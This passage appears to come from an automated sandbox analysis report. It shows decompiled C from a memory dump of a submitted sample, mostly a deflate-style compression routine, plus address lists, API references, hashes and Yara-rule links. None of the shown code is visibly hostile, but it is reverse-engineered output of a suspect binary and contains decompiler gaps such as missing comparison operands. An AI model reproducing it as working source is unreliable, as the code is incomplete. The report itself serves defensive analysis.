							_t412 =  <  ? _t366 :  *((intOrPtr*)( *((intOrPtr*)(_t415 + 0x7c)))) - _t371;
							memcpy( *((intOrPtr*)(_t415 + 0x74)) + _t371, _t404, _t412);
							 *((intOrPtr*)(_t415 + 0x8c)) =  *((intOrPtr*)(_t415 + 0x8c)) + _t412;
							_t367 = _t366 - _t412;
							if(_t367 == 0) {
								goto L98;
							} else {
								 *(_t415 + 0x58) = _t412;
								 *(_t415 + 0x5c) = _t367;
								return _t367;
							}
						}
					} else {
						 *((intOrPtr*)( *((intOrPtr*)(_t415 + 0x78)))) =  *((intOrPtr*)(_t415 + 0x84)) -  *((intOrPtr*)(_t415 + 0x70));
						_t304 =  *((intOrPtr*)( *_t415))(_t415 + 0x39272, _t366,  *((intOrPtr*)(_t415 + 4)));
						if(_t304 != 0) {
							goto L98;
						} else {
							 *((intOrPtr*)(_t415 + 0x6c)) = 0xffffffff;
							return _t304 | 0xffffffff;
						}
					}
				}
			}

0x00a86e70
0x00a86e78
0x00a86e7a
0x00a86e7e
0x00a86e8c
0x00a86ea0
0x00a86ea0
0x00a86e8e
0x00a86e94
0x00a86e9e
0x00000000
0x00000000
0x00a86e9e
0x00a86eaa
0x00a86ec7
0x00a86ec7
0x00a86eac
0x00a86eaf
0x00a86ebe
0x00000000
0x00a86ec0
0x00a86ec3
0x00a86ec3
0x00a86ebe
0x00a86ed0
0x00a86ed3
0x00a86edb
0x00a86ee1
0x00a86ee8
0x00a86eef
0x00a86efa
0x00a86f04
0x00a86f0c
0x00a86f16
0x00a86f19
0x00a86f1c
0x00a86f22
0x00a86f24
0x00a86f24
0x00a86f2a
0x00a86f2f
0x00a86f31
0x00a86f31
0x00a86f34
0x00a86f38
0x00a86f3c
0x00a86f24
0x00a86f42
0x00a86f4c
0x00a86f4f
0x00a86f4f
0x00a86f52
0x00a86f58
0x00a86f60
0x00a86f60
0x00a86f66
0x00a86f6b
0x00a86f6d
0x00a86f6d
0x00a86f70
0x00a86f74
0x00a86f78
0x00a86f60
0x00a86f58
0x00a86f7e
0x00a86f8b
0x00a86f8e
0x00a86f8e
0x00a86f91
0x00a86f97
0x00a86fa0
0x00a86fa0
0x00a86fa6
0x00a86fab
0x00a86fad
0x00a86fad
0x00a86fb0
0x00a86fb4
0x00a86fb8
0x00a86fa0
0x00a86fc2
0x00a86fc5
0x00a86fc8
0x00a86fcb
0x00a86fce
0x00a87016
0x00a8701f
0x00a8712b
0x00000000
0x00a87025
0x00a87027
0x00a87030
0x00a87033
0x00a87036
0x00a8703c
0x00a87040
0x00a87040
0x00a87046
0x00a8704b
0x00a8704d
0x00a8704d
0x00a87050
0x00a87054
0x00a87058
0x00a87040
0x00a8705e
0x00a87063
0x00a87067
0x00a87070
0x00a87073
0x00a87073
0x00a87079
0x00a8707e
0x00a87080
0x00a87080
0x00a87083
0x00a87087
0x00a8708b
0x00a87073
0x00a87091
0x00a87096
0x00a87096
0x00a8709f
0x00a870a2
0x00a870a2
0x00a870a5
0x00a870ab
0x00a870b0
0x00a870b0
0x00a870b6
0x00a870bb
0x00a870bd
0x00a870bd
0x00a870c0
0x00a870c4
0x00a870c8
0x00a870b0
0x00a870ce
0x00a870d5
0x00a870d5
0x00a870db
0x00a870e0
0x00a870e3
0x00a870f7
0x00a870fa
0x00a870fa
0x00a870fd
0x00a87103
0x00a87105
0x00a87105
0x00a8710b
0x00a87110
0x00a87112
0x00a87112
0x00a87115
0x00a87119
0x00a8711d
0x00a87105
0x00a87123
0x00a87124
0x00a87129
0x00a870db
0x00a86fd0
0x00a86fd7
0x00a86fe8
0x00a86fdf
0x00a86fe0
0x00a86fe0
0x00a86fed
0x00a86ff2
0x00a86ff7
0x00a86ffa
0x00a86fff
0x00a8712e
0x00a87130
0x00a87136
0x00a87139
0x00a8713c
0x00a8713f
0x00a87144
0x00a87149
0x00a87149
0x00a87013
0x00a87013
0x00000000
0x00a87013
0x00a86fff
0x00a8714e
0x00a87153
0x00a87159
0x00a8715f
0x00a871f3
0x00a871f7
0x00a871fa
0x00a871fd
0x00a87203
0x00a87205
0x00a87205
0x00a8720b
0x00a87210
0x00a87212
0x00a87212
0x00a87215
0x00a87219
0x00a8721d
0x00a87205
0x00a87223
0x00a87228
0x00a8722c
0x00a87235
0x00a87238
0x00a87238
0x00a8723e
0x00a87243
0x00a87245
0x00a87245
0x00a87248
0x00a8724c
0x00a87250
0x00a87238
0x00a87256
0x00a87260
0x00a87260
0x00a87268
0x00a8726b
0x00a8726b
0x00a8726e
0x00a87274
0x00a87276
0x00a87276
0x00a8727c
0x00a87281
0x00a87283
0x00a87283
0x00a87286
0x00a8728a
0x00a8728e
0x00a87276
0x00a87294
0x00a8729a
0x00a8729a
0x00a87165
0x00a87167
0x00a8716b
0x00a87174
0x00a87177
0x00a87177
0x00a8717d
0x00a87182
0x00a87184
0x00a87184
0x00a87187
0x00a8718b
0x00a8718f
0x00a87177
0x00a8719c
0x00a871a2
0x00a871a5
0x00a871b0
0x00a871b0
0x00a871ba
0x00a871bd
0x00a871bd
0x00a871c0
0x00a871c6
0x00a871c8
0x00a871c8
0x00a871ce
0x00a871d3
0x00a871d5
0x00a871d5
0x00a871d8
0x00a871dc
0x00a871e0
0x00a871c8
0x00a871e6
0x00a871e9
0x00a871e9
0x00a871ec
0x00a8719c
0x00a8715f
0x00a872ab
0x00a872bc
0x00a872cb
0x00a872d1
0x00a872da
0x00a872e0
0x00a872e3
0x00a872e6
0x00a872ed
0x00a872f4
0x00a872f6
0x00a87382
0x00a8738b
0x00a872fc
0x00a872ff
0x00a87336
0x00a8733e
0x00a8737c
0x00000000
0x00a87340
0x00a87343
0x00a87352
0x00a8735a
0x00a87360
0x00a87369
0x00a8736b
0x00000000
0x00a8736d
0x00a8736d
0x00a87373
0x00a8737b
0x00a8737b
0x00a8736b
0x00a87301
0x00a8730d
0x00a8731c
0x00a87323
0x00000000
0x00a87326
0x00a87326
0x00a87335
0x00a87335
0x00a87323
0x00a872ff

APIs

memset.NTDLL ref: 00A872AB
memset.NTDLL ref: 00A872BC

Memory Dump Source

Source File: 00000000.00000002.196081466.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.196076849.0000000000A80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196091012.0000000000A8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196095270.0000000000A8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196100057.0000000000A8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_pitEBNziGR.jbxd

Yara matches

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 0a518b6ad37497caebabc91d183b94993f8ec807bf5999fe82e073b95af6afb7
Instruction ID: ef77e78ba41ccd8a0a68ea5e2ac653dc7c3a56dd72a3ffa1b5abdf2059979944
Opcode Fuzzy Hash: 0a518b6ad37497caebabc91d183b94993f8ec807bf5999fe82e073b95af6afb7
Instruction Fuzzy Hash: 8C024030505B108FDB35DF2AC6846AAB7F1BF55724B600A2EC6E786EA0D732F845CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00A88D50, Relevance: 3.0, APIs: 2, Instructions: 39COMMON

Download Yara Rule

APIs

RtlGetVersion.NTDLL(?), ref: 00A88D6D
GetNativeSystemInfo.KERNEL32(?), ref: 00A88D77

Memory Dump Source

Source File: 00000000.00000002.196081466.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.196076849.0000000000A80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196091012.0000000000A8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196095270.0000000000A8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196100057.0000000000A8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_pitEBNziGR.jbxd

Yara matches

Similarity

API ID: InfoNativeSystemVersion
String ID:
API String ID: 2296905803-0
Opcode ID: d16e754f9e2ca0212d7a29888e3612066a51463ccad783b8fc365de3f3981a4e
Instruction ID: e6c80e7f5b7e9bf32daa2e3b9d86497d6147a67f31523d836032d3f4b2f6686c
Opcode Fuzzy Hash: d16e754f9e2ca0212d7a29888e3612066a51463ccad783b8fc365de3f3981a4e
Instruction Fuzzy Hash: 6CF03132D105284BF751CF6ACC496C8B7F9E788304F0482A0E42DF6609D6B4EA16DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00A877F0, Relevance: .6, Instructions: 581
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E00A877F0(intOrPtr* __ecx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				intOrPtr* _v76;
				intOrPtr _t375;
				signed int _t380;
				signed int _t381;
				signed int _t382;
				signed int _t390;
				void* _t402;
				signed int _t410;
				unsigned int* _t411;
				unsigned int* _t420;
				signed int _t432;
				unsigned int* _t434;
				unsigned int* _t451;
				unsigned int* _t453;
				void* _t463;
				void* _t480;
				signed int _t483;
				signed int _t494;
				signed char _t504;
				signed int _t508;
				signed int _t509;
				signed char _t510;
				signed int _t511;
				signed int _t513;
				signed int _t514;
				intOrPtr* _t516;
				intOrPtr* _t517;
				intOrPtr _t520;
				intOrPtr _t522;
				intOrPtr _t523;
				signed int _t524;
				signed int _t528;
				signed char* _t531;
				void* _t534;
				signed char _t538;
				signed char _t543;
				void* _t548;
				void* _t550;
				intOrPtr* _t551;
				intOrPtr _t555;
				intOrPtr _t556;
				intOrPtr _t557;
				intOrPtr _t558;
				signed int _t564;
				intOrPtr* _t567;
				intOrPtr* _t571;
				intOrPtr _t572;
				signed int _t573;
				signed int _t575;
				signed int _t576;
				signed int _t579;
				signed int _t582;
				intOrPtr _t585;
				signed int _t587;
				signed int _t590;
				signed int _t591;
				signed int _t592;
				void* _t594;
				signed int _t595;
				signed int _t600;
				intOrPtr _t601;
				signed int _t602;
				signed int _t603;
				signed int _t604;
				signed int _t605;
				signed int _t606;
				signed int _t608;
				signed int _t610;
				intOrPtr* _t612;

				_t612 = __ecx;
				_v76 = __ecx;
				_t571 =  *((intOrPtr*)(__ecx + 0x84));
				_t601 =  *((intOrPtr*)(__ecx + 0x88));
				_t375 =  *((intOrPtr*)(__ecx + 0x80));
				_v12 = _t571;
				_v20 = _t601;
				_v48 = _t375;
				L2:
				while(_t601 != 0 || _t375 != 0 &&  *((intOrPtr*)(_t612 + 0x20)) != _t601) {
					_t520 =  *((intOrPtr*)(_t612 + 0x20));
					if( *((intOrPtr*)(_t612 + 0x24)) + _t520 < 2) {
						if(_t601 != 0) {
							while(1) {
								_t557 =  *((intOrPtr*)(_t612 + 0x20));
								if(_t557 >= 0x102) {
									goto L11;
								}
								_t601 = _t601 - 1;
								_t510 =  *_t571;
								_t483 =  *(_t612 + 0x1c) + _t557 & 0x00007fff;
								_v20 = _t601;
								_t571 = _t571 + 1;
								_v12 = _t571;
								 *(_t483 + _t612 + 0x90) = _t510;
								if(_t483 < 0x101) {
									 *(_t483 + _t612 + 0x8090) = _t510;
								}
								 *((intOrPtr*)(_t612 + 0x20)) =  *((intOrPtr*)(_t612 + 0x20)) + 1;
								_t558 =  *((intOrPtr*)(_t612 + 0x20));
								if( *((intOrPtr*)(_t612 + 0x24)) + _t558 >= 3) {
									_t608 =  *(_t612 + 0x1c) + _t558 + 0xfffffffd;
									_t579 = _t608 & 0x00007fff;
									_t89 = _t608 + 1; // 0x11
									_t564 = (( *(_t579 + _t612 + 0x90) & 0x000000ff) << 0x0000000a ^ _t510 & 0x000000ff) & 0x00007fff ^ ( *((_t89 & 0x00007fff) + _t612 + 0x90) & 0xff) << 0x00000005;
									 *((short*)(_t612 + 0x19272 + _t579 * 2)) =  *(_t612 + 0x29272 + _t564 * 2);
									_t571 = _v12;
									 *(_t612 + 0x29272 + _t564 * 2) = _t608;
									_t601 = _v20;
								}
								if(_t601 != 0) {
									continue;
								} else {
								}
								goto L11;
							}
						}
					} else {
						_t494 =  *(_t612 + 0x1c) + _t520;
						_t610 = _t494 & 0x00007fff;
						_t13 = _t494 - 2; // 0xe
						_t511 = _t13;
						_t16 = _t511 + 1; // 0xf
						_t582 = ( *((_t511 & 0x00007fff) + _t612 + 0x90) & 0x000000ff) << 0x00000005 ^  *((_t16 & 0x00007fff) + _t612 + 0x90) & 0x000000ff;
						_t502 =  <  ? _v20 : 0x102 - _t520;
						_v20 = _v20 - 0x102;
						_t503 = ( <  ? _v20 : 0x102 - _t520) +  *((intOrPtr*)(_t612 + 0x20));
						_v56 = _v12 + 0x102;
						_t567 = _v12;
						 *((intOrPtr*)(_t612 + 0x20)) = ( <  ? _v20 : 0x102 - _t520) +  *((intOrPtr*)(_t612 + 0x20));
						while(_t567 != _v56) {
							_t504 =  *_t567;
							_v12 = _t567 + 1;
							 *(_t612 + _t610 + 0x90) = _t504;
							if(_t610 < 0x101) {
								 *(_t610 + _t612 + 0x8090) = _t504;
							}
							_t582 = (_t582 << 0x00000005 ^ _t504 & 0x000000ff) & 0x00007fff;
							_t610 = _t610 + 0x00000001 & 0x00007fff;
							 *((short*)(_t612 + 0x19272 + (_t511 & 0x00007fff) * 2)) =  *(_t612 + 0x29272 + _t582 * 2);
							_t567 = _v12;
							 *(_t612 + 0x29272 + _t582 * 2) = _t511;
							_t511 = _t511 + 1;
						}
						_t601 = _v20;
					}
					L11:
					_t572 =  *((intOrPtr*)(_t612 + 0x20));
					_t522 =  <  ? 0x8000 - _t572 :  *((intOrPtr*)(_t612 + 0x24));
					_v24 = _t522;
					 *((intOrPtr*)(_t612 + 0x24)) = _t522;
					if(_v48 != 0 || _t572 >= 0x102) {
						_t380 =  *((intOrPtr*)(_t612 + 0x50));
						_t602 = 0;
						_v64 = _t380;
						_v56 = 1;
						_t508 =  !=  ? _t380 : 2;
						_v8 = 0;
						_t381 =  *(_t612 + 0x1c);
						_v28 = _t381;
						_v28 = _v28 & 0x00007fff;
						_v16 = 2;
						if(( *(_t612 + 8) & 0x00090000) == 0) {
							_t382 = _t381 & 0x00007fff;
							_t523 = _v24;
							_v32 = _t382;
							_t603 = _t382;
							_v52 = 2;
							asm("sbb eax, eax");
							_v60 =  *((intOrPtr*)(_t612 + 0x10 + _t382 * 4));
							_v72 = _t612 + 0x90;
							_v44 =  *(_t603 + 2 + _t612 + 0x8f) & 0x0000ffff;
							_v68 =  *(_t612 + _t603 + 0x90) & 0x0000ffff;
							if(_t572 > 2) {
								while(1) {
									_t125 =  &_v60;
									 *_t125 = _v60 - 1;
									if( *_t125 == 0) {
										goto L33;
									}
									_t604 =  *(_t612 + 0x19272 + _t603 * 2) & 0x0000ffff;
									if(_t604 == 0) {
										goto L33;
									} else {
										_t592 =  *(_t612 + 0x1c) - _t604 & 0x0000ffff;
										_v40 = _t592;
										if(_t592 > _t523) {
											goto L33;
										} else {
											_t603 = _t604 & 0x00007fff;
											_t548 = _v52 + _t612;
											if( *((intOrPtr*)(_t548 + _t603 + 0x8f)) == _v44) {
												L51:
												if(_t592 == 0) {
													goto L33;
												} else {
													_t523 = _v24;
													_t516 = _t612 + 0x90 + _t603;
													if( *_t516 != _v68) {
														_t508 = _v16;
														continue;
													} else {
														_t550 = _v32 + _t612 + 0x90;
														_t594 = 0x20;
														while(1) {
															_t160 = _t550 + 2; // 0x7401fe83
															_t551 = _t550 + 2;
															_t517 = _t516 + 2;
															if( *_t160 !=  *_t517) {
																break;
															}
															_t161 = _t551 + 2; // 0xfe83f08b
															_t551 = _t551 + 2;
															_t517 = _t517 + 2;
															if( *_t161 ==  *_t517) {
																_t162 = _t551 + 2; // 0xf08bffff
																_t551 = _t551 + 2;
																_t517 = _t517 + 2;
																if( *_t162 ==  *_t517) {
																	_t163 = _t551 + 2; // 0xfffffe61
																	_t551 = _t551 + 2;
																	_t517 = _t517 + 2;
																	if( *_t163 ==  *_t517) {
																		_t594 = _t594 - 1;
																		if(_t594 != 0) {
																			continue;
																		}
																	}
																}
															}
															break;
														}
														_v36 = _t551;
														_t595 = _v40;
														if(_t594 == 0) {
															_t602 = _t595;
															_t508 =  <  ?  *((void*)(_t612 + 0x20)) : 0x102;
															_v16 = 0x102;
															goto L34;
														} else {
															_t612 = _v76;
															_t508 = _v16;
															_t463 = (0 |  *_t551 ==  *_t517) + (_t551 - _v72 + _v32 >> 1) * 2;
															_t523 = _v24;
															if(_t463 <= _v52) {
																continue;
															} else {
																_v8 = _v40;
																_t555 =  *((intOrPtr*)(_t612 + 0x20));
																_t600 =  <  ? _t555 : _t463;
																_v52 = _t600;
																_t508 = _t600;
																_v16 = _t508;
																if(_t600 == _t555) {
																	goto L33;
																} else {
																	_t523 = _v24;
																	_t184 = _t612 + 0x8f; // 0xa8279020
																	_v44 =  *(_v32 + _t600 + _t184) & 0x0000ffff;
																	continue;
																}
															}
														}
													}
												}
											} else {
												_t605 =  *(_t612 + 0x19272 + _t603 * 2) & 0x0000ffff;
												if(_t605 == 0) {
													goto L33;
												} else {
													_t592 =  *(_t612 + 0x1c) - _t605 & 0x0000ffff;
													_v40 = _t592;
													if(_t592 > _v24) {
														goto L33;
													} else {
														_t603 = _t605 & 0x00007fff;
														if( *((intOrPtr*)(_t548 + _t603 + 0x8f)) == _v44) {
															goto L51;
														} else {
															_t606 =  *(_t612 + 0x19272 + _t603 * 2) & 0x0000ffff;
															if(_t606 == 0) {
																goto L33;
															} else {
																_t592 =  *(_t612 + 0x1c) - _t606 & 0x0000ffff;
																_v40 = _t592;
																if(_t592 > _v24) {
																	goto L33;
																} else {
																	_t603 = _t606 & 0x00007fff;
																	_t523 = _v24;
																	if( *((intOrPtr*)(_t548 + _t603 + 0x8f)) != _v44) {
																		continue;
																	} else {
																		goto L51;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									L95:
									 *(_t612 + 0x1c) =  *(_t612 + 0x1c) + _t528;
									 *((intOrPtr*)(_t612 + 0x20)) =  *((intOrPtr*)(_t612 + 0x20)) - _t528;
									_t402 =  *((intOrPtr*)(_t612 + 0x24)) + _t528;
									_t530 =  <  ? _t402 : 0x8000;
									 *((intOrPtr*)(_t612 + 0x24)) =  <  ? _t402 : 0x8000;
									_t531 =  *(_t612 + 0x28);
									if(_t531 > _t612 + 0x1926a) {
										L99:
										_t601 = _v20;
										 *((intOrPtr*)(_t612 + 0x84)) = _v12;
										 *((intOrPtr*)(_t612 + 0x88)) = _t601;
										_t534 = E00A86E70(_t612, 0);
										if(_t534 != 0) {
											return 0 | _t534 > 0x00000000;
										} else {
											_t375 = _v48;
											goto L1;
										}
									} else {
										_t585 =  *((intOrPtr*)(_t612 + 0x3c));
										_t601 = _v20;
										_t375 = _v48;
										if(_t585 <= 0x7c00) {
											L1:
											_t571 = _v12;
											goto L2;
										} else {
											if((_t531 - _t612 - 0x9272) * 0x73 >> 7 >= _t585) {
												goto L99;
											} else {
												_t375 = _v48;
												if(( *(_t612 + 8) & 0x00080000) == 0) {
													goto L1;
												} else {
													goto L99;
												}
											}
										}
									}
									goto L103;
								}
								goto L33;
							} else {
								L33:
								_t602 = _v8;
							}
							goto L34;
						} else {
							if(_t522 == 0 || ( *(_t612 + 8) & 0x00080000) != 0) {
								L34:
								if(_t508 != 3 || _t602 < 0x2000) {
									goto L36;
								} else {
									_t573 = _v28;
									_t524 =  *(_t612 + 8);
									goto L65;
								}
							} else {
								_t508 = 0;
								_v16 = 0;
								_t556 =  *((intOrPtr*)((_v28 - 0x00000001 & 0x00007fff) + _t612 + 0x90));
								if(_t572 == 0) {
									L31:
									_t508 = 0;
									_v16 = 0;
									L36:
									_t573 = _v28;
									_t524 =  *(_t612 + 8);
									if(_t573 == _t602) {
										L65:
										_t508 = 0;
										_t602 = 0;
										_v16 = 0;
									} else {
										if((_t524 & 0x00020000) != 0 && _t508 <= 5) {
											goto L65;
										}
									}
								} else {
									_t480 = _v28 + _t612;
									while( *((intOrPtr*)(_t480 + _t508 + 0x90)) == _t556) {
										_t508 = _t508 + 1;
										if(_t508 < _t572) {
											continue;
										}
										break;
									}
									_v16 = _t508;
									if(_t508 < 3) {
										goto L31;
									} else {
										_t602 = 1;
										goto L34;
									}
								}
							}
						}
						_t390 = _v64;
						if(_t390 == 0) {
							if(_t602 != 0) {
								if( *((intOrPtr*)(_t612 + 0x14)) != 0 || (_t524 & 0x00010000) != 0 || _t508 >= 0x80) {
									_t316 = _t508 - 3; // -3
									 *((intOrPtr*)(_t612 + 0x3c)) =  *((intOrPtr*)(_t612 + 0x3c)) + _t508;
									_t319 = _t602 - 1; // -1
									_t509 = _t319;
									_t575 = _t509 >> 8;
									 *( *(_t612 + 0x28)) = _t316;
									( *(_t612 + 0x28))[1] = _t509;
									( *(_t612 + 0x28))[2] = _t575;
									 *(_t612 + 0x28) =  &(( *(_t612 + 0x28))[3]);
									 *( *(_t612 + 0x2c)) =  *( *(_t612 + 0x2c)) >> 0x00000001 | 0x00000080;
									_t327 = _t612 + 0x38;
									 *_t327 =  *((intOrPtr*)(_t612 + 0x38)) - 1;
									if( *_t327 == 0) {
										_t411 =  *(_t612 + 0x28);
										 *(_t612 + 0x2c) = _t411;
										 *((intOrPtr*)(_t612 + 0x38)) = 8;
										 *(_t612 + 0x28) =  &(_t411[0]);
									}
									_t576 = _t575 & 0x0000007f;
									_t333 = (_t509 & 0x000001ff) + 0xa8b220; // 0x201001d
									_t334 = _t576 + 0xa8b1a0; // 0x12000000
									_t400 =  <  ?  *_t333 & 0x000000ff :  *_t334 & 0x000000ff;
									_t528 = _v16;
									 *((short*)(_t612 + 0x83d2 + ( <  ?  *_t333 & 0x000000ff :  *_t334 & 0x000000ff) * 2)) =  *((short*)(_t612 + 0x83d2 + ( <  ?  *_t333 & 0x000000ff :  *_t334 & 0x000000ff) * 2)) + 1;
									if(_t528 >= 3) {
										_t410 =  *(0xa8b41a + _t528 * 2) & 0x0000ffff;
										goto L94;
									}
								} else {
									_t528 = _v56;
									_t414 =  <  ? _t573 : 0x8100;
									 *(_t612 + 0x54) =  *(( <  ? _t573 : 0x8100) + _t612 + 0x90) & 0x000000ff;
									 *((intOrPtr*)(_t612 + 0x4c)) = _t602;
									 *((intOrPtr*)(_t612 + 0x50)) = _t508;
								}
							} else {
								_t417 =  <  ? _t573 : 0x8100;
								_t538 =  *(( <  ? _t573 : 0x8100) + _t612 + 0x90);
								 *((intOrPtr*)(_t612 + 0x3c)) =  *((intOrPtr*)(_t612 + 0x3c)) + 1;
								 *( *(_t612 + 0x28)) = _t538;
								 *(_t612 + 0x28) =  &(( *(_t612 + 0x28))[1]);
								 *( *(_t612 + 0x2c)) =  *( *(_t612 + 0x2c)) >> 1;
								_t299 = _t612 + 0x38;
								 *_t299 =  *((intOrPtr*)(_t612 + 0x38)) - 1;
								if( *_t299 == 0) {
									_t420 =  *(_t612 + 0x28);
									 *(_t612 + 0x2c) = _t420;
									 *((intOrPtr*)(_t612 + 0x38)) = 8;
									 *(_t612 + 0x28) =  &(_t420[0]);
								}
								_t410 = _t538 & 0x000000ff;
								_t528 = _v56;
								L94:
								 *((short*)(_t612 + 0x8192 + _t410 * 2)) =  *((short*)(_t612 + 0x8192 + _t410 * 2)) + 1;
							}
						} else {
							if(_t508 <= _t390) {
								 *((intOrPtr*)(_t612 + 0x3c)) =  *((intOrPtr*)(_t612 + 0x3c)) + _t390;
								_t513 =  *((intOrPtr*)(_t612 + 0x4c)) - 1;
								 *( *(_t612 + 0x28)) = _t390 - 3;
								_t587 = _t513 >> 8;
								( *(_t612 + 0x28))[1] = _t513;
								( *(_t612 + 0x28))[2] = _t587;
								 *(_t612 + 0x28) =  &(( *(_t612 + 0x28))[3]);
								 *( *(_t612 + 0x2c)) =  *( *(_t612 + 0x2c)) >> 0x00000001 | 0x00000080;
								_t266 = _t612 + 0x38;
								 *_t266 =  *((intOrPtr*)(_t612 + 0x38)) - 1;
								if( *_t266 == 0) {
									_t434 =  *(_t612 + 0x28);
									 *(_t612 + 0x2c) = _t434;
									 *((intOrPtr*)(_t612 + 0x38)) = 8;
									 *(_t612 + 0x28) =  &(_t434[0]);
								}
								_t431 =  <  ?  *((_t513 & 0x000001ff) + 0xa8b220) & 0x000000ff :  *((_t587 & 0x0000007f) + 0xa8b1a0) & 0x000000ff;
								 *((short*)(_t612 + 0x83d2 + ( <  ?  *((_t513 & 0x000001ff) + 0xa8b220) & 0x000000ff :  *((_t587 & 0x0000007f) + 0xa8b1a0) & 0x000000ff) * 2)) =  *((short*)(_t612 + 0x83d2 + ( <  ?  *((_t513 & 0x000001ff) + 0xa8b220) & 0x000000ff :  *((_t587 & 0x0000007f) + 0xa8b1a0) & 0x000000ff) * 2)) + 1;
								_t432 = _v64;
								if(_t432 >= 3) {
									 *((short*)(_t612 + 0x8192 + ( *(0xa8b41a + _t432 * 2) & 0x0000ffff) * 2)) =  *((short*)(_t612 + 0x8192 + ( *(0xa8b41a + _t432 * 2) & 0x0000ffff) * 2)) + 1;
								}
								_t528 =  *((intOrPtr*)(_t612 + 0x50)) - 1;
								 *((intOrPtr*)(_t612 + 0x50)) = 0;
							} else {
								_t543 =  *(_t612 + 0x54);
								 *((intOrPtr*)(_t612 + 0x3c)) =  *((intOrPtr*)(_t612 + 0x3c)) + 1;
								 *( *(_t612 + 0x28)) = _t543;
								 *(_t612 + 0x28) =  &(( *(_t612 + 0x28))[1]);
								 *( *(_t612 + 0x2c)) =  *( *(_t612 + 0x2c)) >> 1;
								_t200 = _t612 + 0x38;
								 *_t200 =  *((intOrPtr*)(_t612 + 0x38)) - 1;
								if( *_t200 == 0) {
									_t453 =  *(_t612 + 0x28);
									 *(_t612 + 0x2c) = _t453;
									 *((intOrPtr*)(_t612 + 0x38)) = 8;
									 *(_t612 + 0x28) =  &(_t453[0]);
								}
								 *((short*)(_t612 + 0x8192 + (_t543 & 0x000000ff) * 2)) =  *((short*)(_t612 + 0x8192 + (_t543 & 0x000000ff) * 2)) + 1;
								if(_t508 < 0x80) {
									_t528 = _v56;
									 *(_t612 + 0x54) =  *(_t573 + _t612 + 0x90) & 0x000000ff;
									 *((intOrPtr*)(_t612 + 0x4c)) = _t602;
									 *((intOrPtr*)(_t612 + 0x50)) = _t508;
								} else {
									_t213 = _t508 - 3; // -3
									 *((intOrPtr*)(_t612 + 0x3c)) =  *((intOrPtr*)(_t612 + 0x3c)) + _t508;
									_t216 = _t602 - 1; // -1
									_t514 = _t216;
									_t590 = _t514 >> 8;
									 *( *(_t612 + 0x28)) = _t213;
									( *(_t612 + 0x28))[1] = _t514;
									( *(_t612 + 0x28))[2] = _t590;
									 *(_t612 + 0x28) =  &(( *(_t612 + 0x28))[3]);
									 *( *(_t612 + 0x2c)) =  *( *(_t612 + 0x2c)) >> 0x00000001 | 0x00000080;
									_t224 = _t612 + 0x38;
									 *_t224 =  *((intOrPtr*)(_t612 + 0x38)) - 1;
									if( *_t224 == 0) {
										_t451 =  *(_t612 + 0x28);
										 *(_t612 + 0x2c) = _t451;
										 *((intOrPtr*)(_t612 + 0x38)) = 8;
										 *(_t612 + 0x28) =  &(_t451[0]);
									}
									_t591 = _t590 & 0x0000007f;
									_t230 = (_t514 & 0x000001ff) + 0xa8b220; // 0x201001d
									_t231 = _t591 + 0xa8b1a0; // 0x12000000
									_t449 =  <  ?  *_t230 & 0x000000ff :  *_t231 & 0x000000ff;
									_t528 = _v16;
									 *((short*)(_t612 + 0x83d2 + ( <  ?  *_t230 & 0x000000ff :  *_t231 & 0x000000ff) * 2)) =  *((short*)(_t612 + 0x83d2 + ( <  ?  *_t230 & 0x000000ff :  *_t231 & 0x000000ff) * 2)) + 1;
									if(_t528 >= 3) {
										 *((short*)(_t612 + 0x8192 + ( *(0xa8b41a + _t528 * 2) & 0x0000ffff) * 2)) =  *((short*)(_t612 + 0x8192 + ( *(0xa8b41a + _t528 * 2) & 0x0000ffff) * 2)) + 1;
									}
									 *((intOrPtr*)(_t612 + 0x50)) = 0;
								}
							}
						}
						goto L95;
					} else {
						break;
					}
					L103:
				}
				 *((intOrPtr*)(_t612 + 0x88)) = _t601;
				 *((intOrPtr*)(_t612 + 0x84)) = _v12;
				return 1;
				goto L103;
			}

0x00a877f8
0x00a877fb
0x00a877fe
0x00a87804
0x00a8780a
0x00a87810
0x00a87813
0x00a87816
0x00000000
0x00a87820
0x00a87838
0x00a87840
0x00a879c6
0x00a879d0
0x00a879d0
0x00a879d9
0x00000000
0x00000000
0x00a879e2
0x00a879e3
0x00a879e7
0x00a879ec
0x00a879ef
0x00a879f0
0x00a879f3
0x00a879ff
0x00a87a01
0x00a87a01
0x00a87a08
0x00a87a0e
0x00a87a16
0x00a87a1e
0x00a87a25
0x00a87a38
0x00a87a56
0x00a87a60
0x00a87a68
0x00a87a6b
0x00a87a73
0x00a87a73
0x00a87a78
0x00000000
0x00000000
0x00a87a7e
0x00000000
0x00a87a78
0x00a879d0
0x00a87846
0x00a87849
0x00a8784d
0x00a87853
0x00a87853
0x00a87865
0x00a87878
0x00a87887
0x00a8788b
0x00a87890
0x00a87893
0x00a87896
0x00a87899
0x00a8789f
0x00a878a1
0x00a878a4
0x00a878a7
0x00a878b4
0x00a878b6
0x00a878b6
0x00a878ce
0x00a878d4
0x00a878e2
0x00a878ea
0x00a878ed
0x00a878f5
0x00a878f6
0x00a878fb
0x00a878fb
0x00a878fe
0x00a878fe
0x00a8790d
0x00a87914
0x00a87917
0x00a8791a
0x00a87928
0x00a8792b
